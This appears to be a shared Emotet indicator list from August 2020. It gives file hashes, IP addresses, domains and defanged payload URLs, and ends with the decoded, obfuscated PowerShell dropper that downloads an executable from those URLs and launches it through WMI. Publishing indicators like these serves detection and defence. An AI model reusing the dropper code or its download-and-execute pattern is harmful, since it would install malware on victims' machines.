
Emotet_Doc_out_2020-08-12_02_28.txt

  1. #Emotet #Docs #malware #OSINT #IOC
  2.  
  3. SHA256:
  4.  
  5. b6d061764b57ecc2c5baa7dc8771eca3169e033c4fcecc9eed583228e6c43c7d
  6. f9cb0402ef5b42e9a6b622ff9c0e6a3e70c9a47083795919cdc6ddc63bbef5e5
  7. 719b3c1717f939215cca7ee3393ef396cb0f8d745750b24781439a14d3e61013
  8. cfad89dc0acb6ca9fb8d2a7c688b9bf6148ad1e44b78413a8f4e207315bb9088
  9. 293ea71fa7f0d9d434dc99654659752447329452e66c7d5b11ab94ba0686af07
  10. a129a1fe3a51426aa403edd27234affe627420b8e6f87c05859de900bc8cbcf8
  11. 68cb1a8d254ca797461e7856e16deb8703d637e12d6ffae4936bd61b18c1eb9d
  12. f250036a8f70c0d3c21d3fe9d60127b45879746797a2bbe697334d2576b3ab75
  13. 18224ef1abb9fcfa1b9abe909618cc7df37889554727bd37df5aba095a0b9cbe
  14. d10bdbfd907f6947fd0d46be5fe73d817a74784ed3aa0af5df00ed33544a6362
  15. 6d584a1d74621185d8158f5409f1818fbfe0ba0f83bb0c4d1364f0e694fa4119
  16. 540c24389f7908941efde04da2d0b9aecc64c53b0b64a81021ff1e5a55892a6c
  17. 129fc005ca8b2794233ec326ef6d75001c2084dbddaae65e267284f40fde3744
  18. bf5cdad7e4473322d05b6b9d00963b809b5767270d150bf3fbc80369baa5db65
  19. 5c3c78999fae5042beddf41da3857172070c10e2203e27c51330732967243ec1
  20. 5040ae89dfcdf457fef0e33ae7f6d1df1cb8d97bcce8e3afe92c73148eb8d648
  21. ef7d42870ae9136798deaa7e169be4e7b5658a42450690c79fd0b608c62dfd18
  22. aa8d5d68477493748dbd276eddf4cf0cbe8e3eea559eceb6b60e03d9b2cb8d61
  23. 136ea2d85935a084e96025d09f475c97eeda378c7fb42a2b621fc77b13d5cc2f
  24. 09c0cfa26f4cd0d4f01151f9ef2aca99770e124d6f31d23ec40a9a419f305a52
  25. 59c0eb17a6928f0d5a9c1bb79ff1de6b854de12390cff96feb32aa0622010c0f
  26. 1d1300efc6cb899350ac45e811810a274d09d6c0046413390aa12d7bf2f94803
  27. 5c7e33c23d454291dacaf4ae431d451d0659a56b3cf2e2a0ed82002b5ee21bdc
  28. b2cfd206679ad3d17bac7cfe788e8b30ed2c5ad2a52856a6a353c6df94f9f751
  29. 98d1ef605c5aaf3bc9405c84661e7fad8a677276231e3d63ef0a3fc4ddb0a8b6
  30. 96493e2b3256bad964338af06464b36ddd2f467b812bdd3c357b3e5b28eeed99
  31. b1f8969e58efd76050984231fb0734bc862f8ff61ffe3815a5fab1f0e2d35c5f
  32. ad28e501b49533c792f360ac328a29b986059f15d6d17d3b37d53b412bb03314
  33. 123d3d66a18c61a68b9c7ce1e927aa1e59d7b04d1ce35e6a1b66edb0b1dd05f2
  34.  
  35.  
  36. IPs:
  37. 110.4.45.182
  38. 149.255.62.70
  39. 162.144.134.38
  40. 208.86.155.52
  41. 91.148.168.34
  42.  
  43. Domains:
  44.  
  45. dutarini.com
  46. ecorideen.ncryptedprojects.com
  47. emediserv.com
  48. enviglobe.com
  49. expart.com
  50.  
  51.  
  52. hxxp://dutarini.com/cgi-bin/Sz012521/
  53. hxxps://ecorideen.ncryptedprojects.com/cron-nct/Mmgmv/
  54. hxxp://enviglobe.com/wp-admin/ItqH87993/
  55. hxxps://expart.com/internal/yS54480/
  56. hxxp://emediserv.com/vra/ulD/
  57.  
  58.  
  59. Decoded Base64 PowerShell (URLs defanged as hxxp/hxxps):
  60. $ZSFAAeob='FPDBIpcm';
  61. [Net.ServicePointManager]::"securIT`yp`R`OtoCol" = 'tls12, tls11, tls';
  62. $XPRABriq = '813';
  63. $MWVCOktv='FZZPMxqs';
  64. $FJUHYrbn=$env:userprofile+'\'+$XPRABriq+'.exe';
  65. $FJQSXevy='WGBYPwkd';
  66. $NGUYAvse=&('n'+'ew-o'+'bject') neT.webcLIeNT;
  67. $UUMECoql='hxxp://dutarini.com/cgi-bin/Sz012521/
  68. hxxps://ecorideen.ncryptedprojects.com/cron-nct/Mmgmv/
  69. hxxp://enviglobe.com/wp-admin/ItqH87993/
  70. hxxps://expart.com/internal/yS54480/
  71. hxxp://emediserv.com/vra/ulD/'."sp`lit"([char]42);
  72. $DPQQHihw='GARDSwng';
  73. foreach($FBRXCtpl in $UUMECoql){try{$NGUYAvse."DOwn`l`oAdFi`Le"($FBRXCtpl, $FJUHYrbn);
  74. $HUYQHqjw='GGKDEixm';
  75. If ((&('G'+'et'+'-Item') $FJUHYrbn)."Le`N`GTH" -ge 22372) {([wmiclass]'win32_Process')."C`RE`AtE"($FJUHYrbn);
  76. $PCHLBqpx='TOEKIkdj';
  77. break;
  78. $NIZHKtap='CVJFFtpr'}}catch{}}$AIXZRszd='BWBSBywz'
  79.  